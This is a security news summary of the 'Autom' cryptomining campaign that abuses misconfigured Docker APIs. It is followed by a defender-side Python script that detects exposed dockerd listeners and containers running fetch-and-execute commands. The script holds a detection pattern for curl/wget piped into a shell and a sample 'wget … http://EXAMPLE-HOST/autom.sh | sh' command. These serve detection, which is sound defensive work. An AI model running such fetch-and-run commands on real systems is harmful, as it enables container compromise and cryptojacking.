Cryptomining Attack Exploits Docker API Misconfiguration Since 2019 (Security News, December 2021)
The attack technique is script-based and dubbed "Autom" because it exploits the file "Autom.sh".
Attackers have consistently abused the API misconfiguration during the campaign's active period, but the evasion tactics have varied, allowing adversaries to fly under the radar, Aquasec's research arm Team Nautilus wrote in a report published Wednesday.
Attackers hit honeypots set up by Team Nautilus 84 times since 2019: 22 attacks in 2019, 58 in 2020, and four in 2021 before researchers began writing up their report in October, researchers said.
Though attackers have used the same entry point and tactics to achieve their ultimate goal of cryptomining, what has changed most about the attack over the years is how threat actors have constantly evolved evasive maneuvers to avoid detection, researchers said.
Attackers have also used five different servers to download the shell script that initiates the attack since the campaign started, they said.
Team Nautilus first observed the attack in 2019 when a malicious command was executed during the run of a vanilla image alpine:latest, which downloaded the autom.
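Two defender-side checks for the pattern described above, written as an added example and not code from the Threatpost article or the Team Nautilus report. It assumes the misconfiguration is the well-known exposure of the Docker daemon's tcp:// listener without TLS client verification, and it flags stock alpine containers whose command downloads and runs a shell script; all sample data (daemon config, container records, the EXAMPLE-HOST URL) is constructed.

```python
"""Defender-side checks for exposed Docker Remote API and fetch-and-run containers.
All sample data below is constructed; the misconfiguration and attack shape are assumptions."""
import re
from typing import Iterable

def unauthenticated_tcp_hosts(daemon_json: dict, dockerd_args: list[str]) -> list[str]:
    """Return every tcp:// listener configured for dockerd that is not protected by
    tlsverify. Both daemon.json ("hosts", "tlsverify") and -H/--host flags are consulted."""
    hosts = list(daemon_json.get("hosts", []))
    for i, arg in enumerate(dockerd_args):
        if arg in ("-H", "--host") and i + 1 < len(dockerd_args):
            hosts.append(dockerd_args[i + 1])
        elif arg.startswith(("-H=", "--host=")):
            hosts.append(arg.split("=", 1)[1])
    tls = bool(daemon_json.get("tlsverify", False)) or "--tlsverify" in dockerd_args
    return [h for h in hosts if h.startswith("tcp://") and not tls]

# Fetch-and-execute shapes: curl/wget piped into a shell, or a downloaded *.sh run directly.
FETCH_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|\b(ba)?sh\s+\S*\.sh\b", re.I)

def suspicious_containers(inspect_records: Iterable[dict]) -> list[str]:
    """Flag containers built from a stock alpine image whose command downloads and runs
    a script. Records follow the shape of `docker inspect` output (Config.Image, Config.Cmd)."""
    hits = []
    for rec in inspect_records:
        cfg = rec.get("Config", {})
        cmd = " ".join(cfg.get("Cmd") or [])
        if cfg.get("Image", "").startswith("alpine:") and FETCH_EXEC.search(cmd):
            hits.append(f"{rec.get('Id', '?')[:12]} {cfg['Image']} :: {cmd}")
    return hits

# Constructed samples (not taken from the report).
SAMPLE_DAEMON = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
SAMPLE_ARGS = ["dockerd"]
SAMPLE_CONTAINERS = [
    {"Id": "deadbeef0001constructed", "Config": {"Image": "alpine:latest",
     "Cmd": ["sh", "-c", "wget -q -O- http://EXAMPLE-HOST/autom.sh | sh"]}},
    {"Id": "deadbeef0002constructed", "Config": {"Image": "alpine:latest", "Cmd": ["/bin/sh"]}},
]

if __name__ == "__main__":
    print(unauthenticated_tcp_hosts(SAMPLE_DAEMON, SAMPLE_ARGS))
    print(suspicious_containers(SAMPLE_CONTAINERS))
```

On a real host, feed `unauthenticated_tcp_hosts` the parsed /etc/docker/daemon.json and the running dockerd command line, and `suspicious_containers` the JSON from `docker inspect` over all containers.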
News URL: https://threatpost.com/cryptomining-attack-exploits-docker-api-misconfiguration-since-2019/177299/